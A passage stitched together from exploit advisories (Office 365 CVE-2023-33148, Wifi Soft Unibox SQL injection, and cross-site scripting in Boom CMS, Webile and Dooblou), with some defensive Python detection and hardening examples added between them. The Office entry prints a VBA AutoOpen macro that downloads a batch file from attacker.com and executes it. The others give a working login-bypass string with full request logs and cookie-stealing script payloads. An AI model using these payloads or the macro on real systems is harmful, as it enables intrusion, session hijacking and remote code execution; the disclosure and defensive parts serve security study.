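    hits = {}
    for ip, ids in ids_by_ip.items():
        best = run = 1
        for prev, cur in zip(ids, ids[1:]):
            run = run + 1 if cur == prev + 1 else 1
            best = max(best, run)
        if best >= min_run:
            hits[ip] = best
    return hits


# Time-based SQL injection primitives for MySQL, PostgreSQL and MSSQL.
TIME_SQLI = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.IGNORECASE)


def detect_time_based_sqli(events):
    """Flag requests whose decoded query string contains a time-delay SQL primitive."""
    return [e for e in events if TIME_SQLI.search(e["raw_query"])]


def run_detections(log_text: str) -> dict:
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    return {
        "pimpmylog_account_creation": detect_pimpmylog_account_creation(events),
        "id_enumeration": detect_id_enumeration(events),
        "time_based_sqli": detect_time_based_sqli(events),
    }


# Constructed sample log (documentation IP ranges, invented timestamps).
SAMPLE_LOG = "\n".join(
    [
        '203.0.113.7 - - [10/Jul/2023:12:00:01 +0000] "POST /pimpmylog/inc/configure.php HTTP/1.1" 200 512 "-" "curl/7.81.0"',
        '203.0.113.7 - - [10/Jul/2023:12:00:02 +0000] "POST /pimpmylog/inc/configure.php HTTP/1.1" 200 512 "-" "curl/7.81.0"',
        '198.51.100.9 - - [12/Jul/2023:09:15:30 +0000] "GET /pimpmylog/index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    ]
    + [
        f'198.51.100.9 - - [12/Jul/2023:09:16:{i:02d} +0000] "GET /joomla/index.php?option=com_booking&controller=customer&task=getUserData&id={i} HTTP/1.1" 200 98 "-" "python-requests/2.31.0"'
        for i in range(1, 7)
    ]
    + [
        '192.0.2.4 - - [16/Jul/2023:08:00:00 +0000] "GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype=%27(select*from(select(sleep(10)))a)%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
        '192.0.2.5 - - [16/Jul/2023:08:00:10 +0000] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    ]
)

if __name__ == "__main__":
    for name, hits in run_detections(SAMPLE_LOG).items():
        print(name, "->", hits if isinstance(hits, dict) else [h["ip"] for h in hits])
```

For the enumeration detector a consecutive-id run is a deliberately narrow signal; the same per-client bucketing can be widened to "many distinct ids in a short window" once the baseline rate for the endpoint is known.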
## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.
## Author: nu11secur1ty
## Date: 07.18.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office
## Reference: https://portswigger.net/web-security/access-control
## CVE-2023-33148

## Description:
The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to Elevation of Privilege. The attacker can use this vulnerability to attach a very malicious WORD file in the Outlook app which is a part of Microsoft Office 365 and easily can trick the victim to click on it - opening it and executing a very dangerous shell command, in the background of the local PC. This execution is without downloading this malicious file, and this is a potential problem and a very dangerous case! This can be the end of the victim's PC, it depends on the scenario.

## Status: HIGH Vulnerability

[+]Exploit:

- Exploit Server:

```vb
Sub AutoOpen()
    Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat && .\salaries.bat", vbNormalFocus)
End Sub
```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)

## Time spent:
00:35:00

Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection

# Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection
# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"
# Date: 07/2023
# Exploit Author: Ansh Jain @sudoark
# Author Contact : arkinux01@gmail.com
# Vendor Homepage: https://www.wifi-soft.com/
# Software Link: https://www.wifi-soft.com/products/unibox-hotspot-controller.php
# Version: Unibox Administration 3.0 & 3.1
# Tested on: Microsoft Windows 11
# CVE : CVE-2023-34635
# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635

The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to SQL Injection, which can lead to unauthorised admin access for attackers. The vulnerability occurs because of not validating or sanitising the user input in the username field of the login page and directly sending the input to the backend server and database.

## How to Reproduce

Step 1 : Visit the login page and check the version, whether it is 3.0, 3.1, or not.
Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and enter any random password.
Step 3 : Fill in the captcha and hit login.

After hitting login, you have been successfully logged in as an administrator and can see anyone's user data, modify data, revoke access, etc.

------------------------------------------------------------
### Login Request
------------------------------------------------------------
Parameters: username, password, captcha, action
------------------------------------------------------------

POST /index.php HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: https://255.255.255.255.host.com
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login

------------------------------------------------------------
### Login Response
------------------------------------------------------------

HTTP/2 302 Found
Server: nginx
Date: Tue, 18 Jul 2023 13:32:14 GMT
Content-Type: text/html; charset=UTF-8
Location: ./dashboard/dashboard
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

------------------------------------------------------------
### Successful Logged-in Request
------------------------------------------------------------

GET /dashboard/dashboard HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

------------------------------------------------------------
### Successful Logged-in Response
------------------------------------------------------------

HTTP/2 200 OK
Server: nginx
Date: Tue, 18 Jul 2023 13:32:43 GMT
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache_control: private

<!DOCTYPE html>
<html lang="en">
html content
</html>
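The Unibox payload works because the username is spliced into the SQL text, where `' or 1=1 limit 1-- -` closes the string literal, makes the WHERE clause always true, and comments out the password check. As an added example that is not code from the advisory or from Wifi Soft, the block below builds the login query both ways against a constructed in-memory SQLite table: the concatenated version returns the first (administrator) row for the advisory's payload with a random password, while the parameterised version treats the whole payload as a username that does not exist. The table, credentials and role names are constructed; the unsalted SHA-256 digest is kept only so the vulnerable query has the shape the payload targets.

```python
import hashlib
import hmac
import sqlite3

PAYLOAD = "'or 1=1 limit 1-- -"              # the advisory's username payload
ADMIN_PASSWORD = "constructed-admin-secret"  # constructed fixture, not a real credential


def _digest(password: str) -> str:
    # Unsalted SHA-256 keeps the query shape the payload targets; a real login
    # should use a password hash such as bcrypt or Argon2 with per-user salts.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory users table with a constructed administrator and a regular user."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        [("admin", _digest(ADMIN_PASSWORD), "administrator"),
         ("guest", _digest("guest-password"), "user")],
    )
    return conn


def vulnerable_login(conn, username: str, password: str):
    """String-built query: the username field becomes part of the SQL text, so a quote
    in it ends the literal and the rest of the input is parsed as SQL."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username='{username}' AND password_hash='{_digest(password)}'")
    return conn.execute(sql).fetchone()


def hardened_login(conn, username: str, password: str):
    """Bound parameter for the lookup, then a constant-time check of the digest in code.
    The payload is just a string value here and matches no username."""
    row = conn.execute(
        "SELECT username, role, password_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None or not hmac.compare_digest(row[2], _digest(password)):
        return None
    return row[0], row[1]


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", vulnerable_login(conn, PAYLOAD, "randompassword"))
    print("hardened:  ", hardened_login(conn, PAYLOAD, "randompassword"))
    print("hardened, real credentials:", hardened_login(conn, "admin", ADMIN_PASSWORD))
```

The fix is the bound parameter alone; the constant-time digest comparison is shown because the same login path is where a loose string comparison would otherwise be written.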

Boom CMS v8.0.7 - Cross Site Scripting

# Exploit Title: Boom CMS v8.0.7 - Cross Site Scripting

References (Source):
https://www.vulnerability-lab.com/get_content.php?id=2274

Release Date:
2023-07-03

Vulnerability Laboratory ID (VL-ID):
2274

Product & Service Introduction:
===============================
Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life easy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content. It gives editors control but doesn't require any technical knowledge.

(Copy of the Homepage: https://www.boomcms.net/boom-boom )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application.

Affected Product(s):
====================
UXB London
Product: Boom v8.0.7 - Content Management System (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2022-07-24: Researcher Notification & Coordination (Security Researcher)
2022-07-25: Vendor Notification (Security Department)
2023-**-**: Vendor Response/Feedback (Security Department)
2023-**-**: Vendor Fix/Patch (Service Developer Team)
2023-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (User Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side.

The vulnerability is located in the input fields of the album title and album description in the asset-manager module. Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description. After the injection the albums are displayed in the backend, where the execution takes place on preview of the main assets. The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parse the content by usage of a backslash. This does not have any impact on injecting own malicious java-scripts because it is only performed for double- and single-quotes to prevent sql injections.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] assets-manager (album)

Vulnerable Function(s):
[+] add

Vulnerable Parameter(s):
[+] title
[+] description

Affected Module(s):
[+] Frontend (Albums)
[+] Backend (Albums Assets)

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Login to the application as restricted user
2. Create a new album
3. Inject a test script code payload to title and description
4. Save the request
5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution
6. Successful reproduce of the persistent cross site web vulnerability!

Payload(s):
><script>alert(document.cookie)</script><div style=1
<a onmouseover=alert(document.cookie)>test</a>

--- PoC Session Logs (Inject) ---
https://localhost:8000/boomcms/album/35
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 263
Origin: https://localhost:8000
Connection: keep-alive
Referer: https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
Sec-Fetch-Site: same-origin
{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>","slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by":null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"}
-
PUT: HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache, private
Set-Cookie: Max-Age=7200; path=/
Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED; Max-Age=7200; path=/; httponly
Content-Length: 242
Connection: Keep-Alive
Content-Type: application/json
-
https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;
-
GET: HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache, private
Set-Cookie: Vary: Accept-Encoding Content-Length: 7866 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 - Vulnerable Source: asset-manager/albums/[ID] <li data-album="36"> <a href="#albums/20"> <div> <h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3> <p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p> <p class='count'><span>0</span> assets</p> </div> </a> </li> </iframe></p></div></a></li></ul></div></div> </div> <div id="b-assets-view-asset-container"></div> <div id="b-assets-view-selection-container"></div> <div id="b-assets-view-album-container"><div><div id="b-assets-view-album"> <div class="heading"> <h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1> <p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p> </div> Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters. Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks. Security Risk: ============== The security risk of the persistent input validation web vulnerability in the application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
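The backslash-only filter described in the advisory is the whole finding: escaping quotes stops a naive SQL string break but leaves `<`, `>` and `=` untouched, so markup and event-handler injection work without a single quote character. The Python below is an added example, not code from the advisory or from Boom CMS. It renders the album card fragment from the "Vulnerable Source" section with (a) a quotes-only filter that approximates the behaviour the advisory describes and (b) HTML entity encoding, then runs the result through Python's HTML tokeniser to see which version still produces a `<script>` element or an `on*` attribute. The template, the filter and all function names are assumptions for illustration; the two payloads are the advisory's own.

```python
import html
from html.parser import HTMLParser

# The two payloads from the Boom CMS advisory above.
PAYLOADS = [
    '><script>alert(document.cookie)</script><div style=1',
    '<a onmouseover=alert(document.cookie)>test</a>',
]


def escape_quotes_only(value: str) -> str:
    """Approximation (an assumption, not Boom CMS code) of the filter the advisory
    describes: backslash-escape quotes and backslashes, PHP addslashes() style.
    This targets SQL string breaking and leaves every HTML metacharacter alone."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def escape_for_html_text(value: str) -> str:
    """Correct encoding for untrusted data placed in an HTML text node such as <h3>."""
    return html.escape(value, quote=True)


def render_album_card(name: str, description: str, encoder) -> str:
    """Hypothetical template for the album fragment shown in the advisory's
    "Vulnerable Source" section, with `encoder` applied to both user fields."""
    return (
        '<li data-album="36"><a href="#albums/20"><div>'
        f"<h3>{encoder(name)}</h3>"
        f'<p class="description">{encoder(description)}</p>'
        "</div></a></li>"
    )


class ActiveContentFinder(HTMLParser):
    """Tokenise the rendered fragment the way a browser would and record anything
    that executes: <script> elements, on* event handlers and javascript: URLs.
    Working on parsed tags rather than raw text means an entity-encoded
    '&lt;a onmouseover=...&gt;' is correctly seen as inert text."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("<script> element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"<{tag}> {name} handler")
            elif name in ("href", "src") and value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"<{tag}> {name}=javascript:")


def active_content(fragment: str) -> list[str]:
    finder = ActiveContentFinder()
    finder.feed(fragment)
    finder.close()
    return finder.findings


def compare(payload: str) -> tuple[bool, bool]:
    """Return (executes_with_quote_escaping, executes_with_html_encoding)."""
    weak = render_album_card(payload, payload, escape_quotes_only)
    strong = render_album_card(payload, payload, escape_for_html_text)
    return bool(active_content(weak)), bool(active_content(strong))


if __name__ == "__main__":
    for p in PAYLOADS:
        weak, strong = compare(p)
        print(f"{p!r}\n  quotes-only filter executes: {weak}\n  HTML encoding executes:      {strong}")
```

The encoding has to match the output context: `html.escape` is right for text nodes and quoted attribute values, which is where the album title and description land in the fragment; data written into a `javascript:` URL, an unquoted attribute or an inline script needs a different encoder.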
HireHackking

Webile v1.0.1 - Multiple Cross Site Scripting

Exploit Title: Webile v1.0.1 - Multiple Cross Site Scripting

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2321

Release Date:
=============
2023-07-03

Vulnerability Laboratory ID (VL-ID):
====================================
2321

Common Vulnerability Scoring System:
====================================
5.5

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Webile is a cross-platform, local area network file management tool based on the HTTP protocol. It uses a personal mobile phone as a server in the local area network for browsing phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data, file statistics, performance display and so on. No Internet connection is needed: files can be browsed, data sent and videos played over a WiFi LAN or a mobile phone hotspot, and no additional mobile data traffic is generated during transfers. Mac, Windows, Linux, iOS, Android and other platforms are supported.

(Copy of the Homepage: https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 WiFi mobile Android web application.

Affected Product(s):
====================
Product Owner: Webile
Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)

Vulnerability Disclosure Timeline:
==================================
2022-10-11: Researcher Notification & Coordination (Security Researcher)
2022-10-12: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Guest Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities have been discovered in the Webile v1.0.1 WiFi mobile Android web application.
The vulnerabilities allow remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

The persistent input validation web vulnerabilities are located in the send and add functions. Remote attackers are able to inject their own malicious script code through the `new_file_name` and `i` parameters of the POST request to provoke a persistent execution of the malformed content. In the session logs below, `i` is a JSON object: the `/file_action` (add) request carries the payload in its `new_file_name` key, and the `/send` request carries it in its `c` key. The stored values are rendered unencoded in the message listing and the history log table.

Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Parameter(s):
[+] new_file_name
[+] i

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers without a user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Vulnerable Source: Send (send message to phone listing)
<div class="layui-colla-item">
<div class="layui-card-header">Message</div>
<div class="layui-colla-content" style="display:block;padding-left:16px;">
<div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;" title="Copy" onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br>
<span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div>
</div></div></div>

Vulnerable Source: history log messages
<table class="layui-table layui-form">
<thead><tr>
<th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center">
<input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th>
<th style="border-right-width:1px;">Message</th>
<th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th>
<th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr>
</thead>
<tbody><tr>
<td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center">
<input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div>
</td>
<td style="height:32px;">
<span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td>
<td align="center">2022/07/17 20:10</td>
<td class="td-manage" style="border-right-width:1px;text-align:center;">
<a title="Copy" onclick="copy(3)" href="javascript:;">
<i class="iconfont">&nbsp;&nbsp;</i>
</a>
<a title="Delete" onclick="deleteLog(this,3)" href="javascript:;">
<i class="layui-icon">&nbsp;&nbsp;</i>
</a></td></tr></tbody></table>

--- PoC Session Logs #1 (POST) --- (Add)
http://localhost:8080/file_action
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 210
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/webile_files
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}
-
POST: HTTP/1.1 200 OK
Content-Type: application/json
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked
-
http://localhost:8080/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost:8080/webile_files
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Connection: keep-alive
Content-Length: 0
-
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6

--- PoC Session Logs #2 (POST) --- (Send)
http://localhost:8080/send
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 180
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/webile_send
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}
-
POST: HTTP/1.1 200 OK
Content-Type: application/json
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked
-
http://localhost:8080/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost:8080/webile_send
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Sun, 17 Jul 2022 18:08:33 GMT
Connection: keep-alive
Content-Length: 0

Security Risk:
==============
The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.

Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities

#Exploit Title: Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2317

Release Date:
=============
2023-07-04

Vulnerability Laboratory ID (VL-ID):
====================================
2317

Common Vulnerability Scoring System:
====================================
5.1

Vulnerability Class:
====================
Multiple

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection. No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s.

(Copy of the Homepage: https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile Android WiFi web-application.

Affected Product(s):
====================
Product Owner: dooblou
Product: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2022-01-19: Researcher Notification & Coordination (Security Researcher)
2022-01-20: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-04: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Guest Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
Multiple input validation web vulnerabilities have been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile Android WiFi web-application.
The vulnerabilities allow remote attackers to inject their own malicious script code with a non-persistent attack vector to compromise browser-to-web-application requests from the application side.

The vulnerabilities are located in the `search`, `order`, `download` and `mode` GET parameters, and in the requested directory path itself, which is echoed back in the "Cannot find file or directory!" error page. The content requested via GET is insecurely validated and reflected into the page, so injected script code executes. The attack vector is non-persistent and the request method used to inject is GET. Attackers do not need to be authorized to perform the attack. The crafted links can, for example, be delivered as a malformed upload so that a view of the front- or backend of the WiFi explorer provokes the execution.

Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.

Proof of Concept (PoC):
=======================
The input validation web vulnerabilities can be exploited by remote attackers without a user account and with low user interaction.
For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue.

PoC: Exploitation
http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK PATH TO RETURN INDEX</a>
http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3
http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3
http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX

Vulnerable Sources: Execution Points
